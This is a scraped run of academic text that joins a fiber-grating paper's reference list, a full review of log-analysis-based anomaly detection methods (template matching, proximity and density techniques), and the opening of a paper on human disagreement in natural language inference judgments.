Journal of sensor technology, 2017, 27(1): 70-74. [11] J.P.LI, X.L.ZENG and J.W. GUAN: Study on refractive index sensing of fiber Bragg grating [J]. Laser and infrared, 2016, 46(6): 737-741. [12] Hampshire T A, AdeliH.:Monitoring the behavior of steel structures using distributed optical fiber sensors. Journal of Constructional Steel Research, 2000, 53(3): 267-281. [13] Hill K O, Fujii Y, Johnson D C, et al. Photosensitivity in optical fiber waveguides: Application to reflection filter fabrication[J]. Applied Physics Letters, 2008, 32(10): 647-649. [14] J. ZHOU, T.G.NING: Study on demodulation of fiber Bragg grating sensing signals [J]. Optical communication technology, 2010,8:8-11. [15] X.LYU, Z.B.ZHANG and Y. QU: Study on curved long-period photonic crystal fiber grating sensing [J]. Laser technology, 2015, 39(4):571-575. [16] J. J.CAO, L.L.HU and R. ZHAO: An optical fiber grating sensing signal de-noising method that improves the wavelet threshold function [J]. Journal of sensing technology, 2015, 28(4): 521-525. [17] Y. P.WANG, L.L.HU and B.WANG: Optical fiber grating sensing signal de-noising based on digital filtering and its FPGA implementation [J]. Journal of xi 'an university of technology, 2015, 31(1): 95-100. [18] L. LIU,M. YU and R.J. YANG:Wavelet de-noising for optical fiber Raman temperature sensing system [J]. China laser, 2013, 40(6): 1-5. work_opocgepdjnannc6k4c6c75p26e ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-036 40 Review of Anomaly Detection Based on Log Analysis Wu Xudong Laboratory of Wireless Network and Intelligent System Xi'an Technological University Xi'an, 710021, China E-mail: wuxudong_wxd@163.com Abstract—The development of the Internet and the emergence of large-scale systems promote the rapid development of society, and bring a lot of convenience to people. Then comes the problem of network security, privacy theft, malicious attacks and other illegal acts still exist, a qualified software system will log the key operation behavior of the software. Therefore, log analysis has become an important means of anomaly detection. Based on log analysis, this paper consulted the related literature on anomaly detection, elaborated the research status of anomaly detection based on log analysis from the aspects of template matching, rule self-generation and outlier analysis, and analyzed the challenges faced by anomaly detection based on log analysis. Keywords-Log Analysis; Distributed; Big Data; Anomaly Detection I. INTRODUCTION With the development of the Internet, big data and artificial intelligence have penetrated into people's lives, unknowingly changing the way people live, food, and transportation, making people's lives faster, more efficient, and easier. Research in various fields of computer is moving towards bionics, including human-like big data processing, human-like computer vision and image processing, human-like voice input, etc. These studies make the computer in a domain not only Clairvoyance, Shunfeng ear, can also save and process a large number of various types of data obtained from various aspects, forming an invisible "superman" individual. In the past 20 years, with the rapid development of the Internet in China, people's lifestyles have undergone tremendous changes. Chinese Internet users continue to grow. According to CNNIC’s 44th "Statistical Report on Internet Development in China", as of June 2019, the number of Internet users in China reached 854 million, an increase of 25.98 million from the end of 2018, and the Internet penetration rate reached 61.2%, compared with the end of 2018. An increase of 1.6 percentage points. The proportions of using desktop computers, laptop computers and tablet computers to surf the Internet were 46.2%, 36.1% and 28.3% respectively. These not only reflect the continuous increase in the number of netizens, but also the rapid and continuous growth of log data from the side. The log records the time point selected by the developer that is worthy of attention and the changes of state or event that is worthy of attention at this point in time. It is the most important source of information for understanding the operating status of the system and diagnosing system problems. Traditionally, system maintainers use tools such as grep and awk to filter keywords such as "error" or International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 41 "exception" in the log to find problems in system operation. When the filtering keywords cannot meet the demand, more experienced personnel will write scripts to impose more complex filtering rules. The cost of this method is very high, writing effective scripts requires a deep understanding of the target system, and these scripts written for specific target systems cannot be applied to other systems, and their versatility is poor. But even without considering the cost, this approach has become no longer feasible for today's software systems. The ever-increasing log data scale and network security issues make network managers face severe challenges: not only need to ensure the stable and efficient operation of the network, but also need to provide secure network services as much as possible. Fortunately, in recent years, distributed computing technology has become more mature. Distributed computing platforms such as Hadoop, Spark, Flume, Storm are being accepted and applied by more and more companies, and are gradually being used in various industries for data storage. And online or offline analysis, which brings opportunities for log data anomaly detection. At the same time, issues such as security and privacy in the network have also emerged. Distributed denial of service attacks, zombie codes, Trojan horses, ransomware, worms and other malicious software have a great negative impact on people’s lives. Once the malware operates, it may cause irreversible losses to the company’s economy. , Poses a great threat to people's privacy. A study showed that [1][2]: Random sample surveys of large-scale systems, more than half of the system failure problems were not logged. At this time, maintenance personnel are required to manually find the cause of the problem. Due to the large amount of code, The time invested is much more. High-quality software code can greatly help the detection efficiency after a program error occurs. Log records at key locations are an important means to ensure that the abnormality can be quickly located and repaired. Therefore, it is necessary to add log records to key positions of the program, and log analysis has become an important method of anomaly detection. The Internet brings convenience to our life, but also brings a series of network security problems. The main characteristics of Internet security problems are as follows: a variety of types, all the time, causing huge losses. All kinds of human attacks, mis-operation, network equipment failure will bring network security problems. Distributed denial of service attack, zombie code, Trojan horse, blackmail program, worm virus and other malicious software appear frequently. Once the malicious software operates, it may cause irreparable loss to the company's economy and cause great impact on people's life. The log records the time points that developers choose to pay attention to and the changes of states or events at this time point. It is the most important information source to understand the system operation status and diagnose system problems. Traditionally, system maintenance personnel use grep, awk and other tools to filter keywords in logs, such as "error" or "exception", to find problems in system operation. When the filtering keywords can't meet the requirements, senior personnel will write scripts to impose more complex filtering rules. The cost of this method is very high, writing effective scripts needs to have a deep understanding of the target system, but these scripts written for specific target system can not be applied to other systems, and the generality is very poor. But even without considering the cost, this approach is no longer feasible for today's software systems. With the increasing scale of log data and network security issues, network managers are facing severe challenges: not only need to ensure the stable and efficient operation of the network, but also need to provide as much as possible secure network services. Fortunately, in recent years, the distributed computing International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 42 technology is becoming more and more mature. Hadoop, spark, flume, storm and other distributed computing platforms are being accepted and applied by more and more enterprises, and are gradually applied to various industries for data storage and online or offline analysis, which brings opportunities for log data anomaly detection. This article first talks about the related knowledge of log analysis and anomaly detection, and then summarizes the current research status of log anomaly detection from the aspects of template matching, rule generation and outlier analysis, analyzes and classifies the articles that have been read, and summarizes the current The types and rules of log anomaly detection are found to be difficult to solve during the detection process. Finally, the future work of anomaly detection based on log analysis is summarized. II. RELATED TECHNOLOGIES AND CONCEPTS OF LOG ANOMALY DETECTION A. Log analysis The log in the computer is a record of events generated with the operation of network equipment, applications, and systems. Each line records the date, time, type, operator, and description of related operations. Figure 1 shows a partial log record of the application. In reality, the log data generated by a system is very large, conforming to the 4V characteristics defined in big data, namely, volume, variety, velocity, and value. These log data will only occupy storage space if they are shelved, and will bring unlimited value if they are properly used. Because these log data have 4V characteristics, it also determines that manual analysis of these data is unrealistic, and log analysis tools must be used to make full use of the value of log data. Figure 1. Part of the application log Here are several current mainstream log analysis tools. Slunk is a full-text search engine for machine data and a hosted log management tool. Its main functions include: log aggregation, search, meaning extraction, grouping, formatting, and visualization of results. ELK is composed of three parts: elasticsearch, logstash, and kibana. Elasticsearch is a near real-time search platform. Compared with MongoDB, elasticsearch has more comprehensive functions and is very capable of performing full-text search. It can index, search, and sort documents, filter. Logstash is a log collection tool, which can collect various messages from local, network and other places and send them to elasticsearch. Kibana provides a visual interface on the web and has a cool dashboard. B. Store log data Due to the huge amount of log data and semi-structured data, the traditional structured database can not meet the storage requirements of log data. HDFS (Hadoop distributed file system) can provide high-throughput data access, which is very suitable for large-scale data sets, and it is suitable for deployment on low-cost machines, which can meet the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 43 storage requirements of log data. In the experiment, the log data generated by the system needs to be stored in HDFS. The configured HDFS will automatically back up the data. The input data file is divided into fixed size blocks. The general size of the data block is 128MB. Each data block is stored in different nodes. Generally, each data block has three copies. The first copy is stored in the same node as the client, the second replica exists on a node in a different rack, and the third replica exists on another node in the same rack as the second replica. C. Log data preprocessing Log data preprocessing has three goals:  filtering "non-conforming" data and cleaning meaningless data;  format conversion and regularization;  filtering and separating various basic data with different needs according to the subsequent statistical requirements. In terms of filtering "non-conforming" data and cleaning meaningless data, the log data generated by the system may be "non-conforming" or meaningless. Before the data format conversion and normalization, a judgment needs to be added to check whether the data is standard and intentional. If not, the data is considered useless and jumps to the next data directly. In terms of format conversion and regularization, we first analyze the characteristics of the data. The fields in each record are separated in the form of spaces. According to this feature, each record is segmented according to the space as the standard. For the fields with spaces inside, we need to use regular matching for special processing. After segmentation, each field is normalized, including time format conversion, number type conversion, path completion, etc. In the aspect of filtering and separating data with different needs, the required fields are extracted according to the needs of subsequent detection algorithms. D. Anomaly detection Anomalies usually include outliers, fluctuation points and abnormal event sequences. Generally, given the input time series X, the outliers are timestamp value pairs (t, Xt), where the observed value xt is different from the expected value of the time series, then the observed value Xt is an outlier. Fluctuation point refers to a given input time series X, at a certain time t its state or behavior in this time series is different from the values before and after T. An abnormal time series is a part of a given set of time series X={Xi} that belongs to X but is inconsistent with most time series values on X. The abnormal point is given in the box in Figure 2. Peng Dong et al. [3] divided anomaly detection methods into three categories: techniques based on statistical models, techniques based on proximity, and techniques based on density. Figure 2. Outlier feature In data mining, anomaly detection identifies items, events, or observations that do not match the expected pattern or other items in the dataset. Usually, abnormal items will turn into bank fraud, structural defects, medical problems, text errors and other types of problems. Anomalies are also known as outliers, novelty, noise, bias, and exceptions. Especially in the detection of abuse and network intrusion, interesting objects are often not rare objects, but they are unexpected activities. This pattern does not follow the usual statistical definition of outliers as rare objects, so many anomaly detection methods will fail to deal with such data unless appropriate aggregation is carried out. On the contrary, clustering analysis algorithm may be able to detect the micro 0 20 40 60 0 10 20 30 anomalous International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 44 clustering formed by these patterns. There are three types of anomaly detection methods. Under the assumption that most instances in the dataset are normal, the unsupervised anomaly detection method can detect the unlabeled test data by finding the most unmatched instance with other data. Supervised anomaly detection requires a dataset that has been labeled "normal" and "abnormal" and involves training classifiers (the key difference from many other statistical classification problems is the inherent imbalance of anomaly detection). The semi supervised anomaly detection method creates a model representing normal behavior based on a given normal training data set, and then detects the possibility of test cases generated by the learning model. III. RESEARCH STATUS OF LOG ANOMALY DETECTION TECHNOLOGY Anomaly detection refers to the process of finding data patterns that do not meet expectations from the data [4]. Anomaly detection behavior based on log data can be regarded as a classification problem in essence, that is to say, distinguish normal behavior and abnormal behavior from a large amount of abnormal log behavior data, and determine the specific attack method from the abnormal behavior [5]. When the server is running, the log will record and generate the behavior of the user throughout the access process. You can find the information of abnormal users by processing the information in the log. Therefore, analyzing logs has become one of the most effective methods to detect abnormal user behavior [6,7,8]. With the rapid development of big data, log-based anomaly detection methods are divided into three categories: model-based technology, proximity-based technology and density-based technology. A. Model-based technology Model-based technology first builds a data model. Anomalies are objects that the model cannot fit perfectly. Since abnormal and normal objects can be regarded as defining two different classes, we can use classification techniques to build models of the two classes. However, the training set is very important in the classification technology. Because anomalies are relatively rare, it is impossible to detect new anomalies that may appear [9]. Wang Zhiyuan et al. [10] used the log template to detect anomalies in 2018. The log was cleaned first, and then the edit distance was used to cluster the text to form the log template. On the basis of the log template, TF-IDF (Word Frequency-Inverse File) was used. Frequency) to form a feature vector, and then use logistic regression, Bayesian, support vector machine and other weak classifiers to train to obtain the score feature vector, build a strong classifier based on the score feature vector and random forest, and finally use mutual information to detect the truth The correlation between the template and the clustering template, the accuracy and recall rate are used to detect the classification effect and various classifiers are compared. Siwoon et al. [11] proposed a new data storage and analysis architecture based on Apache Hive to process a large amount of Hadoop log data, using average movement and 3-sigma technology to design and implement three anomaly detection methods, these three methods They are the basic method, linear weight method and exponential weight method. The first method calculates the average line and standard deviation of anomaly detection, but there are repeated detections. In order to solve this problem, there are two other weighted detection methods, namely linear weighting and exponential weighting. In the linear weighting method, the weight is given in proportion to the position of the log item, and the exponential weight method is to give the weight exponentially on top of the basic method. Finally, the effectiveness of the proposed method is evaluated in a hadoop environment with a name node and four data nodes. Fu et al. [12] proposed a technique that does not require any specific application knowledge for anomaly detection in unstructured system logs, International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 45 including a method of extracting log keys from free text messages. The false positive rate of their experiments under the Hadoop platform is about 13%. Xu et al. [13] used source code to match the log format to find the relevant variables, extracted the features of the corresponding log variables through the bag-of-words model, and then used these features to reduce the dimensionality through the principal component analysis method, according to the maximum separability of principal component analysis Detect abnormal log files, and finally use a decision tree to visualize the results. Fronza et al. [14] used the operation sequence represented by the random index, characterized the operation in each log according to its context, and then used the support vector machine to correlate the sequence to the fault or non-fault category to predict system failure . Peng et al. [15] applied text mining technology to classify messages in log files as common cases, improved classification accuracy by considering the time characteristics of log messages, and used visualization tools to evaluate and verify the effective time for system management mode. B. Technology based on proximity Proximity-based technology considers proximity measures between objects, such as "distance". Zhang Luqing et al. [16] proposed a web attack data mining algorithm based on the anomaly degree of outliers, which first clustered HTTP requests, and then proposed a detection model that approximates normal distribution. The algorithm first finds the arithmetic mean of each numerical attribute value and the most frequently occurring value in each categorical attribute as the centroid of the numerical attribute and the centroid of the categorical attribute, and after synthesis, the centroid T of the data set is obtained, and the distance between the object p and the centroid T is obtained. As the abnormality of p. Finally, experiments have confirmed that the algorithm has a higher detection rate. Jakub Breier et al. [17] proposed a log file anomaly detection method, which dynamically generates rules from certain patterns in sample files and can learn new types of attacks while minimizing the need for human behavior. The implementation uses the Apache Hadoop framework to provide distributed storage and distributed data processing to support parallel processing to speed up execution. Since the incremental mining algorithm based on the local outlier factor requires multiple scans of the data set, Zhang Zhongping et al. [18] proposed a flow data outlier mining algorithm (SOMRNN) based on inverse k nearest neighbors. Using the sliding window model to update the current window requires only one scan, which improves the efficiency of the algorithm. Grace et al. [19] used data mining methods to analyze Web log files to obtain more information about users. In their work, they describe the log file format, type and content, and provide an overview of the Web usage mining process. Liang Bao et al. [20] proposed a general method for mining console logs to detect system problems. First give some formal problem definitions, and then extract a set of log statements in the source code and generate a reachability graph to show the reachability of log statements. After that, log files are analyzed to create log messages by combining information about log statements with information retrieval techniques. The grouping of these messages is tracked according to the execution unit. A detection algorithm based on probabilistic suffix tree is proposed to organize and distinguish the significant statistical characteristics of sequences. Experiments were conducted on the CloudStack test platform and Hadoop production system, and the results showed that compared with the existing four algorithms for detecting abnormalities, this algorithm can effectively detect abnormal operation. Since there are fewer abnormal points in reality, Liu et al. [21] proposed an anomaly detection algorithm based on isolation. The isolation tree created can quickly converge but requires sub-sampling to achieve high accuracy. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 46 C. Density-based technology Density-based technology considers objects in low-density areas as abnormal points. The density-based local outlier detection algorithm (LOF) has high time complexity and is not suitable for outlier detection of large-scale data sets and high-dimensional data sets. Wang Jinghua et al. [22] proposed a local outlier Point detection algorithm NLOF. Li Shaobo et al. [23] proposed a density-based abnormal data detection algorithm GSWCLOF. The algorithm introduces the concept of sliding time window and grid. In the sliding time window, the grid is used to subdivide the data, and the information entropy is used for all The data in the grid is pruned and filtered to eliminate most of the normal data, and finally the outlier factor is used to make a final judgment on the remaining data. Wang Qian et al. [24] proposed a density-based detection algorithm, which introduced the Local Outlier Factor (LOF), and judged whether the data is abnormal based on the LOF value of the data. The algorithm is only suitable for static data detection. Once the amount of data fluctuates, it is necessary to recalculate the LOF value of all data. The algorithm has poor adaptability and is not suitable for the detection process of dynamic data. Pukelsheim et al. [25] assumed that the data sample obeys a univariate Gaussian distribution, and judged the test sample that is outside of the distance twice or three times the variance as abnormal. IV. CHALLENGES FACED BY LOG ANOMALY DETECTION TECHNOLOGY There are several obstacles from the time the system abnormality occurs to the successful detection of the abnormality:  The exception log is not recorded  The format of exception log records is not standardized  The exception log cannot be sent to the processing end in time  Abnormal log sending is lost  The detection algorithm is not accurate enough Any occurrence of one or more of the above conditions will result in failure of the anomaly detection result. A. Real-time The purpose of anomaly detection is to find anomalies and find a corresponding method to float the anomaly, and the time delay from logging, to anomaly detection, to manual analysis, and to anomaly elimination is too long, which leads to anomalies that exist for too long. The losses were more serious. If real-time performance can be guaranteed, the efficiency of exception elimination will be greatly improved. B. Detection accuracy Anomaly detection has various factors that affect its accuracy, such as irregular log format, inappropriate algorithm, etc. These problems directly lead to a decrease in the accuracy of anomaly detection, which also determines that log anomaly detection cannot be completely separated from the intervention of technicians. Even if the same benchmark data set is used in the literature for anomaly detection, most of them do not indicate the size or proportion of labeled data. Even the size of training and test sets and evaluation indicators are different. Different measurement combinations make the research results unable to compare with each other C. The versatility of detection algorithms At present, there are many anomaly detection algorithms at home and abroad, such as: Isolation Forest, One-Class SVM, Robust covariance, K-means, Principal Component Analysis, 3-ε, etc. These algorithms have their own advantages and disadvantages and are not suitable for all anomaly detection. However, due to its unstructured and non-identical characteristics of logs, a specific algorithm is needed for a specific log, or a specific International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 47 algorithm is improved to achieve a higher detection rate. The "localization" of the algorithm also requires specialized technical personnel to operate, which increases the cost of detection. D. Tag data In the log data, there is a large amount of data, and there are very few abnormal data. It is very difficult to mark a small amount of abnormal data in a large amount of data. There is no such publicly marked data as the experimental basis, so anomaly detection encountered great difficulties. V. RESEARCH DIRECTION OF ANOMALY DETECTION Based on the current research status of anomaly detection technology and the above problems, the challenges and future research directions of anomaly detection are summarized as follows: Traffic data often have high characteristic dimensions, and the Euclidean distance in the sampling method can not measure the spatial distribution of the samples very well. The data distribution environment of supervised learning and semi supervised learning are different. Under unbalanced data, most of the existing semi supervised methods apply the traditional methods to semi supervised learning. Therefore, the traditional methods to solve the imbalance problem are not necessarily suitable for semi supervised learning and need further research. Although the research on data imbalance has achieved good results in the field of network security, there are very few researches on the imbalance problem in semi supervised learning. Most of the semi supervised methods applied in the field of anomaly detection use ensemble learning to solve the class imbalance. In the future, we can solve the problem of anomaly detection by combining the latest achievements in the field of data imbalance under semi supervision. At present, many network traffic feature selection and extraction are limited to one dimensional features or simple combination of multi-dimensional features, while traffic anomalies usually show in multi-dimensional features. How to effectively fuse multi-dimensional features, learn data flow features from multiple perspectives, and use a small amount of labeled data for semi supervised integration algorithm synthesis results to reduce information loss is a challenging research topic. Semi supervised dimensionality reduction is a feasible method in the field of anomaly detection. How to find a more effective way to deal with high-dimensional sparse samples and continuous variables and further improve the real-time performance of detection model is of great significance. The learning effect of the combination of active learning and semi supervised learning strategy is better than that of single method. The combination of semi supervised learning and active learning can actively find effective supervision information. Through effective supervision information, unlabeled sample data can be used better, thus improving the accuracy of the model and solving speed. However, the research on the combination of semi supervised learning and active learning is rare, and there is a large space for improvement. Incremental semi supervised anomaly detection is more in line with the actual anomaly detection. It makes full use of the data results processed before in the training process. It should have more in-depth research in the field of network security. In the future, we can consider introducing the incremental algorithm of natural language technology into specific anomaly detection. Semi supervised clustering algorithm uses the traditional clustering algorithm to introduce the supervised information to complete the semi supervised learning, so it can also expand the semi supervised clustering algorithm such as density International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 48 clustering and spectral clustering. In addition, some traffic data are high-dimensional and sparse. However, most of the existing clustering algorithms are not suitable for processing high-dimensional sparse data. In future research, it is necessary to make further discussion. In general, semi supervised learning can help improve performance by using unlabeled data, especially when the number of labeled data is limited. However, in some cases, the selection of unreliable unlabeled data may mislead the formation of classification boundaries and eventually lead to the degradation of semi supervised learning performance. Therefore, how to use unlabeled data safely is a research focus in the future. It can combine multiple semi supervised anomaly detection methods and technologies to achieve more efficient network data detection and obtain more accurate prediction results. In addition, in semi supervised anomaly detection, it is a challenging research topic to minimize the additional impact on the network. VI. CONCLUSION Machine learning faces many challenges in the field of abnormal traffic detection. The biggest difficulty is the lack of label data. In practice, only a limited number of tagged data is available, while most of the data is unmarked. In addition, although there are a large number of normal access data, there are few abnormal traffic samples and various attack forms, which make it difficult to learn and train the model. Semi supervised learning is an effective solution, which can make use of both unlabeled data and labeled data, which can alleviate this problem. For anomaly detection based on log analysis, domestic and foreign countries have made certain progress and achieved various results. Various algorithms such as template matching, automatic rule generation, outlier analysis, and statistical data have certain effects, which are of great significance to network security and intelligent operation and maintenance. Future research will continue to focus on real-time performance to ensure that abnormalities can be detected as quickly as possible. Improve detection accuracy, minimize manual intervention or cancel manual intervention. Study the versatility of the algorithm, so that an algorithm can adapt to log analysis in different environments as much as possible. REFERENCES [1] Yuan D, Park S, Huang P, Liu Y, Lee MM, Tang X, Zhou Y, Savage S. Be conservative: enhancing failure diagnosis with proactive logging. In: Proc. of the 10th Symp. on Operating Systems Design and Implementation (OSDI). 2012. 293~306. [2] Yuan D, Park S, Zhou Y. Characterizing logging practices in open-source software. In: Proc. of the 2012 Int'l Conf. on Software Engineering. 2012. 102~112. [doi: 10.1109/ICSE. 2012.6227202]. [3] Peng Dong. Intelligent operation and maintenance: building a large-scale distributed AIOps system from zero. Electronic Industry Press, 2018.7 ISBN 978-7-121-34663-7 p198-p199. [4] Varun Chandola, Arindam Banerjee, Vipin Kumar. Anomaly Detection: A Survey[J]. Acm Computing Surveys, 2009, 41(3). [5] Davis J J, Clark A J. Data preprocessing for anomaly based network intrusion detection: A review[J]. Computers & Security, 2011, 30(6-7):353-375. [6] Q. Lin, H. Zhang, J. Lou, Y. Zhang and X. Chen, "Log Clustering Based Problem Identification for Online Service Systems," 2016 IEEE/ACM 38th International Conference on Software Engineering Companion (ICSE-C ), Austin, TX, 2016, pp. 102-111. [7] Pecchia A, Cotroneo D, Kalbarczyk Z, et al. Improving Log-based Field Failure Data Analysis of multi-node computing systems[C]. IEEE, 2011. [8] Tambe R, Karabatis G, Janeja V P. Context aware discovery in web data through anomaly detection[J]. International Journal of Web Engineering and Technology, 2015, 10(1):3. [9] Wang Xiaodong, Zhao Yining, Xiao Haili, Chi Xuebin, Wang Xiaoning. Detection method of abnormal log flow pattern in multi-node system [J/OL]. Journal of Software: 1-15 [2019-12-24]. [10] Wang Zhiyuan, Ren Chongguang, Chen Rong, Qin Li. Anomaly detection technology based on log template[J]. Intelligent Computers and Applications, 2018, 8(05): 17-20+24. [11] Son S, Gil MS, Moon YS. [IEEE 2017 IEEE International Conference on Big Data and Smart Computing (BigComp)-Jeju Island, South Korea (2017.2.13-2017.2.16)] 2017 IEEE International Conference on Big Data and Smart Computing (BigComp)-Anomaly detection for big log data using a Hadoop ecosystem[J]. 2017:377-380. [12] Fu, Q., Lou, JG, Wang, Y., & Li, J. (2009). Execution anomaly detection in distributed systems through unstructured log analysis. In Proceedings of the 2009 ninth IEEE international conference on data mining, ICDM '09, (pp. 149–158). Washington, DC: IEEE Computer Society. doi:10.1109/ICDM. 2009.60. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 49 [13] Xu W, et al. Large-scale system problems detection by mining console logs[J]. Proceedings of the Acm Sigops Symposium on Operating Systems Principles Big Sky Mt, 2013:2009. [14] Ilenia Fronza, Alberto Sillitti, Giancarlo Succi, Mikko Terho, Jelena Vlasenko. Failure prediction based on log files using Random Indexing and Support Vector Machines[J]. Journal of Systems and Software, 2013, 86(1):2- 11. [15] Peng W, Li T, Ma S. Mining logs files for data-driven system management. ACM SIGKDD Explorations Newsletter, 2005, 7(1):44-51. [16] Zhang Luqing. Web attack data mining algorithm based on outlier anomaly[J]. Ship Electronic Engineering, 2018, 38(09): 105-110. [17] Breier J, Jana Branišová. A Dynamic Rule Creation Based Anomaly Detection Method for Identifying Security Breaches in Log Records[J]. Wireless Personal Communications, 2015, 94(3):1-15. [18] Zhang Zhongping, Liang Yongxin. Algorithm for mining outliers in flow data based on anti-k nearest neighbors[J]. Computer Engineering, 2009, 35(12): 11-13. [19] Grace, L., Maheswari, V., & Nagamalai, D. (2011). Web log data analysis and mining. In N. Meghanathan, B. Kaushik, & D. Nagamalai (Eds.), Advanced computing, communications in computer and information science (Vol. 133, pp. 459–469). Berlin: Springer. [20] Liang Bao, Qian Li, Peiyao Lu, Jie Lu, Tongxiao Ruan, Ke Zhang. (2018). Execution anomaly detection in large-scale systems through console log analysis. The Journal of Systems & Software 143 (2018) 172– 186. [21] Liu F T, Ting K M, Zhou Z H. Isolation-Based Anomaly Detection[J]. ACM Transactions on Knowledge Discovery from Data, 2012, 6(1):1-39. [22] Wang Jinghua, Zhao Xinxiang, Zhang Guoyan, Liu Jianyin. NLOF: A new density-based local outlier detection algorithm [J]. Computer Science, 2013, 40(08): 181-185. [23] Li Shaobo, Meng Wei, Wei Jinglei. Density-based abnormal data detection algorithm GSWCLOF[J]. Computer Engineering and Applications, 2016, 52(19): 7-11. [24] Wang Qian, Liu Shuzhi. Improvement of local outlier data mining method based on density [J]. Application Research of Computers, 2014, 31(06): 1693-1696+1701. [25] Pukelsheim F. The Three Sigma Rule[J]. The American Statistician, 1994, 48(2):88-91. work_oqwzwsqahzdmxjlup3t334s4ei ---- Inherent Disagreements in Human Textual Inferences Ellie Pavlick Brown University ellie pavlick@brown.edu Tom Kwiatkowski Google Research tomkwiat@google.com Abstract We analyze human’s disagreements about the validity of natural language inferences. We show that, very often, disagreements are not dismissible as annotation ‘‘noise’’, but rather persist as we collect more ratings and as we vary the amount of context provided to raters. We further show that the type of uncertainty captured by current state-of-the-art models for natural language inference is not reflective of the type of uncertainty present in human disagreements. We discuss implications of our results in relation to the recognizing textual entailment (RTE)/natural language inference (NLI) task. We argue for a refined evaluation objective that requires models to explicitly capture the full distribution of plausible human judgments. 1 Introduction Entailment is arguably one of the most fun- damental of language understanding tasks, with Montague himself calling entailment ‘‘the basic aim of semantics’’ (Montague, 1970). Compu- tational work on recognizing textual entailment (RTE) (also called natural language inference, or NLI) has a long history, ranging from early efforts to model logical phenomena (Cooper et al., 1996), to later statistical methods for modeling practical inferences needed for applications like informa- tion retrieval and extraction (Dagan et al., 2006), to current work on learning common sense hu- man inferences from hundreds of thousands of examples (Bowman et al., 2015; Williams et al., 2018). Broadly speaking, the goal of the NLI task is to train models to make the inferences that a human would make. Currently, ‘‘the inferences that a human would make’’ are determined by asking multiple human raters to label pairs of sentences, and then seeking some consensus among them. For example, having raters choose among discrete labels and taking a majority vote (Dagan et al., 2006; Bowman et al., 2015; Williams et al., 2018), or having raters use a continuous Likert scale and taking an average (Pavlick and Callison-Burch, 2016a; Zhang et al., 2017). That is, the prevailing assumption across annotation methods is that there is a single ‘‘true’’ inference about h given p that we should train models to predict, and that this label can be approximated by aggregating multi- ple (possibly noisy) human ratings as is typical in many other labelling tasks (Snow et al., 2008; Callison-Burch and Dredze, 2010). Often, however, we observe large disagree- ments among humans about whether or not h can be inferred from p (see Figure 1). The goal of this study is to establish whether such disagree- ments can safely be attributed to ‘‘noise’’ in the annotation process (resolvable via aggregation), or rather are a reproducible signal and thus should be treated as part of the NLI label assigned to the p/h pair. Specifically, our primary contributions are: • We perform a large-scale study of humans’ sentence-level inferences and measure the degree to which observed disagreements persist across samples of annotators. • We show that current state-of-the-art NLI systems do not capture this disagreement by default (by virtue of treating NLI as probabilistic) and argue that NLI evaluation should explicitly incentivize models to pre- dict distributions over human judgments. • We discuss our results with respect to the definition of the NLI task, and its increased usage as a diagnostic task for evaluating ‘‘general purpose’’ representations of natural language. 677 c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Transactions of the Association for Computational Linguistics, vol. 7, pp. 677–694, 2019. https://doi.org/10.1162/tacl a 00293 Action Editor: Christopher Potts. Submission batch: 5/2019; Published: 1 1/ 2019. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 https://doi.org/10.1162/tacl_a_00293 Figure 1: Example p/h pair on which humans exhibit strong disagreements about whether h can be inferred from p. Here, the disagreement appears to stem from the implicature, but we observe similar disagreements on a variety of linguistic phenomena. 2 The RTE/NLI Task The task of RTE/NLI is fundamentally concerned with drawing conclusions about the world on the basis of limited information, but specifically in the setting when both the information and the conclusions are expressed in natural language. That is, given a proposition p, should one infer some other proposition h to be true? Traditionally, in formal linguistics, the defini- tion of entailment used is that defined in formal logic—namely, p entails h if h is true in every possible world in which p is true. This logical definition takes for granted that lexical and con- structional meanings are fixed in such a way that it is possible to fully pre-specify and then repeatedly apply those meanings across all contexts. From the point of view of evaluating NLP systems’ ability to reason about entailment, these are clearly diffi- cult criteria to operationalize. Thus, within NLP, we have rarely if ever evaluated directly against this definition. Rather, work has been based on the below informal definition: p entails h if, typically, a human reading p would infer that h is most likely true. . . [assuming] common human un- derstanding of language [and] common background knowledge (Dagan et al., 2006). This definition was intended to undergo refine- ment overtime, with Dagan et al. (2006) explicitly stating that the definition was ‘‘clearly not mature yet’’ and should evolve in response to observed shortcomings, and, in fact, substantial discussion surrounded the original definition of the RTE task. In particular, Zaenen et al. (2005) argued that the definition needed to be made more precise, so as to circumscribe the extent to which ‘‘world knowledge’’ should be allowed to factor into in- ferences, and to explicitly differentiate between distinct forms of textual inference (e.g., entailment vs. conventional implicature vs. conversational implicature). Manning (2006) made a counter- argument, pushing back against a prescriptivist definition of what types of inferences are or are not licensed in a specific context, instead advocat- ing that annotation tasks should be ‘‘natural’’ for untrained annotators, and that the role of NLP should be to model the inferences that humans make in practical settings (which include not just entailment, but also pragmatic inferences such as implicatures). Both supported the use of the term ‘‘inference’’ over ‘‘entailment’’ to acknowledge the divergence between the working NLP task definition and the notion of entailment as used in formal semantics.1 Since the task’s introduction, there has been no formal consensus around which of the two approaches offers the better cost–benefit tradeoff: precise (at risk of being impractical), or organic (at risk of being ill-defined). That said, there has been a clear gravitation toward the latter, apparent in the widespread adoption of inference datasets that explicitly prioritize natural inferences over rigorous annotation guidelines (Bowman et al., 2015; Williams et al., 2018), and in the overall shift to the word ‘‘inference’’ over ‘‘entailment.’’ There has also been significant empirical evidence supporting the argument that humans’ semantic inferences are uncertain and context-sensitive (Poesio and Artstein, 2005; Versley, 2008; Simons et al., 2010; Recasens et al., 2011; de Marneffe et al., 2012; Passonneau et al., 2012; Pavlick and Callison-Burch, 2016a,b; Tonhauser et al., 2018, among others) suggesting computational models would benefit from focusing on ‘‘speaker meaning’’ over ‘‘sentence meaning’’ when it comes to NLI (Manning, 2006; Westera and Boleda, 2019). Thus, in this paper, we assume that NLP will maintain 